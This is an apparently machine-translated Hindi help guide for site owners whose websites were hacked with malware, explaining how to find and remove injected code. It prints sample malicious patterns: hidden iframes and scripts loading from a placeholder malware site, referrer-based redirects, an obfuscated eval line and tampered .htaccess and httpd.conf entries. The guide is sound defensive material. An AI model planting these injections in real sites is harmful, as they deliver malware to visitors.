मैलवेयर के साथ हैक किए गए

मैलवेयर एक तरह का सॉफ़्टवेयर या मोबाइल ऐप्लिकेशन होता है, जिसे खास तौर पर किसी कंप्यूटर, मोबाइल डिवाइस, उसमें चल रहा सॉफ़्टवेयर या उसे इस्तेमाल करने वाले लोगों के लिए बनाया गया हो. मैलवेयर के बारे में ज़्यादा जानकारी पाने के लिए, मैलवेयर और अनचाहा सॉफ़्टवेयर लेख पढ़ें.

अगर आपकी साइट में मैलवेयर है, तो लोगों को आम तौर पर चेतावनी दिखेगी "यह साइट आपके कंप्यूटर को नुकसान पहुंचा सकती है" खोज नतीजों में या किसी पेज पर जब उपयोगकर्ता आपके ऐप्लिकेशन पर जाने की कोशिश करता है, तो उसे ब्राउज़र से अचानक दिखने वाला पेज साइट पर कुछ इस तरह से देखें:

प्रतिनिधि मैलवेयर इंटरस्टीशियल पेज
मैलवेयर की चेतावनी वाले खोज के नतीजे.

आपको इनकी ज़रूरत होगी:

  • आपकी साइट के सर्वर के लिए शेल या टर्मिनल एडमिन ऐक्सेस: वेब, डेटाबेस, और फ़ाइलें शामिल हैं.
  • शेल या टर्मिनल कमांड का ज्ञान.
  • डेटाबेस पर एसक्यूएल क्वेरी चलाने की सुविधा.

वीडियो की रणनीति

  • Search Console के लिए साइन अप करें और जैसा कि वहां बताया गया है, हैक की गई साइट के मालिकाना हक की पुष्टि करेगा. Search Console प्रभावित पेजों का एक नमूना उपलब्ध कराता है, जो उन पेजों को ढूंढने के लिए मैलवेयर के साथ हैक की गई समस्याओं को बहुत आसानी से ठीक करना. साथ ही, आपको चेतावनी दी जाएगी कि जब यह पता चलता है कि आपकी साइट पर कई तरह के मैलवेयर या अन्य हैक का असर हुआ है.

  • Google सुरक्षित ब्राउज़िंग में गड़बड़ी की जानकारी वाला पेज देखें का इस्तेमाल करके इस बारे में सार्वजनिक जानकारी देखी जा सकती है कि क्या कोई साइट उपयोगकर्ताओं के लिए संभावित रूप से नुकसान पहुंचा सकती है. आप यूआरएल पर अपने पेज या साइट की लिस्टिंग की स्थिति, इससे मिलते-जुलते यूआरएल पर देख सकते हैं: https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>*** उदाहरण के लिए: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>> किसी पेज का यूआरएल (http://example.com/badpage) हो सकता है या आपकी पूरी साइट (example.com).

  • अपनी साइट पर पेजों को देखने के लिए ब्राउज़र का इस्तेमाल न करें. क्योंकि अक्सर मैलवेयर ब्राउज़र की कमियों का फ़ायदा उठाकर फैलता है, मैलवेयर से संक्रमित ब्राउज़र को खोलेगा आपके कंप्यूटर को नुकसान हो सकता है. जब तक कि गड़बड़ी की पहचान करने के निर्देश न दिए जाएं सीधे अपने ब्राउज़र से पेज को ऐक्सेस करने के लिए कहें, cURL का इस्तेमाल करें या एचटीटीपी अनुरोध करने के लिए Wget (उदाहरण के लिए, किसी पेज को फ़ेच करना).

    आसानी से उपलब्ध ये टूल, रीडायरेक्ट का पता लगाने में मददगार होते हैं. साथ ही, रेफ़रल देने वाले या उपयोगकर्ता एजेंट की जानकारी शामिल करने की सुविधा मिलती है. इसमें शामिल है: खास रेफ़रर या उपयोगकर्ता एजेंट की मदद से, हैकर की नकल की जा सकती है, क्योंकि हैकर उपयोगकर्ताओं को नुकसान पहुंचाने वाला कॉन्टेंट दिखा सकते हैं. ज़्यादा "असल लोगों" को टारगेट करने के लिए उपयोगकर्ता-एजेंट या रेफ़रर और ऐसा करने से बचें मैलवेयर स्कैन करने वाले ऐप्लिकेशन और टूल हैं.

`curl -v --referer "http://www.google.com" <your-url>`

यहां एक उदाहरण दिया गया है, जिसमें उपयोगकर्ता एजेंट और रेफ़रर, दोनों के बारे में बताया गया है:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

हमारा सुझाव है कि आप पेज को फ़ेच करने के लिए, इसके साथ और इसके बिना भी पेज को फ़ेच करें --referer "https://www.google.com", क्योंकि कुछ मैलवेयर सिर्फ़ ऐक्टिव हुए हैं लोगों को Google Search से मिले खोज नतीजों के आधार पर दिखाया जाता है.

  • इस चरण के निष्कर्षों को रिकॉर्ड करने के लिए एक दस्तावेज़ बनाएं. दस्तावेज़ पर आखिर में (कम से कम) हर खराब फ़ाइल का नाम और जगह की जानकारी शामिल करनी होगी साथ ही, इसमें बताया जाएगा कि यह कैसे संक्रमित हुआ. साथ ही, अपनी साइट को साफ़ करें और बनाए रखें.

  • यह जानने के लिए कि मैलवेयर कैसे काम करता है और आप आपके मैलवेयर की जांच के दौरान सुरक्षित रह सकते हैं.

संक्रमण की जांच

पता करें कि कौनसा मैलवेयर आपकी साइट पर असर डाल रहा है:

  1. सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट खोलें Search Console में अपनी साइट के लिए. जिन पेजों पर मैलवेयर का असर हुआ है उनके उदाहरण देखने के लिए, मैलवेयर की चेतावनी की जानकारी को बड़ा करें. ध्यान दें कि यह पूरी सूची नहीं है; ऐसा हो सकता है कि आपको आपकी साइट पर मौजूद सभी तरह के मैलवेयर के बारे में जानकारी मिलेगी.
  2. इस तरह के मैलवेयर का पता लगाने के लिए, उदाहरण के तौर पर दिए गए पेजों की जांच करें.

सर्वर कॉन्फ़िगरेशन मैलवेयर (अनचाहे रीडायरेक्ट)

किसी हैकर ने आपकी साइट से छेड़छाड़ की है और वह आपकी साइट पर आने वाले लोगों को दूसरे वेबलिंक पर भेज रहा है मैलवेयर अटैक साइट से जोड़ दिया है, जो शायद आपके सर्वर की फ़ाइलों में बदलाव करके कॉन्फ़िगरेशन फ़ाइल(फ़ाइलें). सर्वर कॉन्फ़िगरेशन फ़ाइलें आम तौर पर साइट को ऐक्सेस करने की अनुमति देती हैं के लिए URL रीडायरेक्ट को निर्दिष्ट करने के लिए वेबसाइट. उदाहरण के लिए, Apache सर्वर पर .htaccess फ़ाइल के साथ-साथ httpd.conf भी है.

संक्रमण की जांच

सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या के उदाहरण वाले यूआरएल पर जाएं. जवाब "सर्वर कॉन्फ़िगरेशन" से संक्रमित पेज से संक्रमण में नीचे दिए गए हेडर:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

जिन फ़ाइलों पर असर पड़ा है उनका पता लगाएं

शेल या टर्मिनल ऐक्सेस के ज़रिए अपने सर्वर में साइन इन करें (साइट ऑफ़लाइन हो सकती है) (अगर आप चाहें) और प्रासंगिक सर्वर कॉन्फ़िगरेशन फ़ाइलों की समीक्षा कर सकते है. और भी हो सकते हैं एक से ज़्यादा हैक की गईं सर्वर कॉन्फ़िगरेशन फ़ाइल होती है. इसके लिए इन फ़ाइलों की जाँच करें अनचाहे निर्देश, जैसे कि अनजान साइटों पर रीडायरेक्ट करना. उदाहरण के लिए, .htaccess` फ़ाइल है, तो आपको रीडायरेक्ट करने के लिए कुछ ऐसा दिख सकता है:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

SQL इंजेक्शन

किसी हैकर ने आपकी साइट के डेटाबेस को हैक कर लिया है. उदाहरण के लिए, हैकर जिन्होंने किसी डेटाबेस के हर रिकॉर्ड में, प्रोग्राम के हिसाब से नुकसान पहुंचाने वाला कोड डाला है ताकि जब सर्वर कोई ऐसा पेज लोड करे, जिसे तो नुकसान पहुंचाने वाला कोड अब पेज के कॉन्टेंट में एम्बेड हो गया है और जिससे साइट पर आने वाले लोगों को नुकसान पहुंचता हो.

संक्रमण की जांच

  1. जिन यूआरएल पर असर पड़ा है उनके बारे में कमांड-लाइन में कुछ क्वेरी चलाएं और जांच करें कि "iframe" जैसे SQL हमले के शब्दों के लिए प्रतिक्रिया या "eval" का इस्तेमाल न करें.

  2. अपने डेटाबेस के सर्वर में साइन इन करें या इस तरह के टूल की मदद से अपना डेटाबेस देखें phpMyAdmin. अगर आपने अगर आपने Wget या cURL का इस्तेमाल किया है, तो पेज के सोर्स से मिले नुकसान के बारे में बताने की कोशिश करें Wget या cURL के ज़रिए वास्तविक डेटाबेस एंट्री के ज़रिए कोड भेजना होगा. उदाहरण के लिए, अगर तो आपने देखा है कि आपके पेजों में एक खतरनाक iframe है, तो आप एसक्यूएल iframe कोड के लिए खोज क्वेरी. उदाहरण के लिए:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. आप अपने सर्वर पर डेटाबेस लॉग और गड़बड़ी फ़ाइलों की जांच भी कर सकते हैं असामान्य गतिविधि, जैसे कि एसक्यूएल के ऐसे निर्देश जो इसके लिए असामान्य लगते हैं नियमित उपयोगकर्ताओं या गड़बड़ियों की वजह से भी ऐसा हो सकता है.

समस्या को ठीक करना

डेटाबेस के उन सभी रिकॉर्ड को अपडेट करें जिनमें गड़बड़ियां हैं बैकअप लें.

कोड इंजेक्शन

आपकी साइट के पेजों में बदलाव किया गया था, ताकि उसमें नुकसान पहुंचाने वाले कोड को शामिल किया जा सके. जैसे, iframe मैलवेयर अटैक साइट हो.

संक्रमण की जांच

सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट में, cURL के साथ उदाहरण के तौर पर दिखाए गए कुछ यूआरएल पर जाएं या संदिग्ध कोड पाने के लिए उसे आज़माएं और उसकी जांच करें. इंजेक्ट किए गए कोड कई तरह के हो सकते हैं. उसे ढूंढना मुश्किल हो. "iframe" जैसे शब्दों को खोजने से, आपको मदद मिल सकती है ढूंढने के लिए iframe कोड. दूसरे मददगार कीवर्ड "script", "eval", और "unescape" हैं. इसके लिए उदाहरण के लिए, "iframe" के लिए सभी फ़ाइलों को खोजने के लिए यूनिक्स-आधारित सिस्टम पर:

$grep -irn "iframe" ./ | less</pre>

यहां जांच करने के लिए कुछ सामान्य मैलवेयर पैटर्न दिए गए हैं.

नुकसान पहुंचाने वाली साइट को लोड करने वाला iframe:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

JavaScript या कोई अन्य स्क्रिप्टिंग भाषा, जो हमलावर साइट:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

ऐसी स्क्रिप्टिंग जो ब्राउज़र को एक हमलावर साइट पर रीडायरेक्ट करती है:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

नुकसान पहुंचाने वाले ऐसे कोड जिन्हें बदल दिया गया है, ताकि उनका पता नहीं लगाया जा सके:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

शेयर की गई ऐसी ऑब्जेक्ट फ़ाइलें जिन्हें किसी भी क्रम में नुकसान पहुंचाने वाला कोड लिखने के लिए डिज़ाइन किया गया है स्क्रिप्ट:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

नुकसान पहुंचाने वाली गड़बड़ी के लिए टेंप्लेट

'404 फ़ाइल नहीं मिली' जैसे गड़बड़ी के मैसेज दिखाने के लिए इस्तेमाल किए जाने वाले टेंप्लेट को कॉन्फ़िगर किया गया मैलवेयर फैलाने में मदद करता है. इस तरह, हमलावर उन यूआरएल पर हमले शुरू कर सकते हैं जिन्हें जो आपकी साइट पर मौजूद ही न हों.

संक्रमण की जांच

अपनी साइट पर ऐसे पेज के लिए अनुरोध करें जो मौजूद नहीं है या जिस पर दूसरे तरह का कॉन्टेंट मौजूद है और देखें कि क्या यह किसी दूसरी साइट से आया है या नहीं तो मैलवेयर होता है.

समस्या को ठीक करना

अपने वेब सर्वर में साइन इन करें और गड़बड़ी का पता लगाने के लिए, अपने सर्वर की कॉन्फ़िगरेशन फ़ाइलें खोजें पेज निर्देशों का पालन करना होगा. उदाहरण के लिए, Apache वेबसर्वर के लिए गड़बड़ी वाले टेंप्लेट .htaccess फ़ाइल में बताया गया है. यहां .htaccess फ़ाइल एंट्री का एक उदाहरण दिया गया है, जो नुकसान पहुंचाने वाली साइट से 404 गड़बड़ी वाले पेजों को वापस लाता है:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

जब आप अपनी साइट को साफ़ करने के लिए तैयार हों, तब .htaccess फ़ाइल(फ़ाइलें) बदल दें का इस्तेमाल करें या मौजूदा .htaccess फ़ाइल(फ़ाइलें). असली गड़बड़ी वाली फ़ाइलों को भी साफ़ करना न भूलें, अगर वे आपकी साइट पर मौजूद होते हैं. आखिर में, यह पक्का करने के लिए अपने वेब सर्वर को रीस्टार्ट करें कि सभी बदलाव लागू होते हैं.

छेड़छाड़ की गई या नुकसान पहुंचाने वाली साइट {compromised-resources} से लोड किए जा रहे संसाधन

आपकी साइट, किसी ऐसी वेबसाइट के कॉन्टेंट या रिसॉर्स का इस्तेमाल करती है जो उसमें शामिल है नुकसान पहुंचाने वाला कॉन्टेंट. ये JavaScript फ़ाइलें, इमेज या अन्य फ़ाइलें हो सकती हैं. इस वजह से, आपकी साइट को किसी दूसरे प्लैटफ़ॉर्म से लोड किए गए मैलवेयर के लिए फ़्लैग किया जाएगा की वेबसाइट पर जाएं.

संक्रमण की जांच

सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या के उदाहरण वाले यूआरएल पर जाएं.

समस्या को ठीक करना

  1. यूआरएल की सूची में दिए गए कुछ सैंपल यूआरएल को ब्राउज़ करके, समस्या की पुष्टि करें Search Console में सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट देखें. आपको ब्राउज़र से जुड़ी चेतावनी दिखनी चाहिए.
  2. ब्राउज़र चेतावनी आपको आपत्तिजनक सामग्री के डोमेन की जानकारी देगी. ब्राउज़र चेतावनी में जिस साइट को आपत्तिजनक पाया गया है उससे जुड़ी सारी सामग्री को अपनी साइट से हटा दें. अगर फ़्लैग की गई साइट का कॉन्टेंट बिना आपकी जानकारी के शामिल किया गया था, तो समस्या ज़्यादा गंभीर है. ऐसा हो सकता है कि आपकी साइट के साथ छेड़छाड़ की गई हो और आप को अन्य हैकिंग और जोखिमों के लिए आपकी साइट की जांच जारी रखनी चाहिए.
  3. अगर आपने जान-बूझकर किसी ऐसी वेबसाइट का कॉन्टेंट शामिल किया है जो फ़्लैग कर दिया गया है और आप फ़्लैग की गई साइट के बाद सामग्री को फिर से शामिल करना चाहते हैं साफ़ किया गया है, तो आप इसका उपयोग करके फ़्लैग की गई साइट की स्थिति की निगरानी कर सकते हैं Google सुरक्षित ब्राउज़िंग में गड़बड़ी की जानकारी वाला पेज उस साइट के लिए (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}. आम तौर पर, मान्य साइटों के मालिक उन्हें तुरंत हटा देते हैं.

अतिरिक्त जांच

इसके बाद, अपने सिस्टम पर मौजूद अन्य नुकसान पहुंचाने वाली फ़ाइलों या बदलावों की जांच करें. कॉन्टेंट बनाने ऐसा हो सकता है कि हैकर ने मौजूदा पेजों या डेटाबेस रिकॉर्ड में पूरी तरह से बदलाव कर दिया हो स्पैम वाले नए पेज, लिखे गए फ़ंक्शन, जो साफ़ पेजों पर स्पैम दिखाते हैं या "पीछे के दरवाज़े" जो हैकर को आपकी साइट पर दोबारा आने या इंजेक्ट करने की अनुमति देते हैं जिसे आपने हटा दिया है.

अगर आपकी साइट ऑनलाइन है, तो इस जांच के लिए उसे ऑफ़लाइन लेने पर विचार करें.

अगर आपके पास अपनी साइट का अच्छा बैकअप है, तो पता लगाएं कि कौनसी फ़ाइलें को बैकअप के बाद बनाया या बदला गया है और उनकी जांच-पड़ताल करें. यूनिक्स-आधारित पर सिस्टम में, नई फ़ाइलें ढूंढने के लिए आप नीचे दिए गए निर्देश का इस्तेमाल कर सकते हैं:

diff -qr <current-directory> <backup-directory>

उदाहरण के लिए:

diff -qr www/ backups/full-backup-20120124/

साथ ही:

md5sum <current-page> <backup-page>

उदाहरण के लिए:

md5sum www/page.html backups/full-backup-20120124/page.html

किसी भी संदिग्ध गतिविधि के लिए सर्वर, ऐक्सेस और गड़बड़ी लॉग की जांच करें, जैसे कि लॉगिन के असफल प्रयास, आदेश इतिहास (विशेषकर रूट के रूप में), और अज्ञात उपयोगकर्ता खाते. ध्यान रखें, हो सकता है कि हैकर ने इन लॉग को बदल दिया हो डेटा इकट्ठा किया जाता है. इसके कुछ उदाहरण इस वीडियो में दिखाए गए हैं जोखिम की आशंका की पहचान करें.

रीडायरेक्ट के लिए कॉन्फ़िगरेशन फ़ाइलें देखें. आपकी कॉन्फ़िगरेशन फ़ाइलें इन्हें आम तौर पर .htaccess और httpd.conf नाम दिया जाता है. हैकर अक्सर शर्तों के साथ उपयोगकर्ता-एजेंट, दिन के समय या रेफ़रर के आधार पर दूसरे वेबलिंक पर भेजना. अगर आपको कॉन्फ़िगरेशन फ़ाइलें अपडेट करते हैं, तो आपको अपने बदलाव करने होंगे.

फ़ोल्डर और फ़ाइल के लिए ज़्यादा बड़ी अनुमतियां देखें. हैकर इनसे छेड़छाड़ करते हैं अनुमतियां दी जाएंगी, क्योंकि अगर साइट के मालिक को आसानी से मिलने वाली अनुमतियों की जानकारी नहीं है, हैकर के पास साइट पर फिर से जाने का एक तरीका होगा. इससे बड़ी फ़ाइलें 644 (rw-r--r--) और 755 (rwxr-xr-x) से बड़े फ़ोल्डर की वजह से सुरक्षा हो सकती है समस्याएं. पक्का करें कि कोई भी पराजित अनुमति वास्तव में आवश्यक है. चालू है यूनिक्स पर आधारित सिस्टम, इनमें से कोई एक आज़माएं:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

और:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

अगर आपके पास कोई डेटाबेस है, तो phpMyAdmin.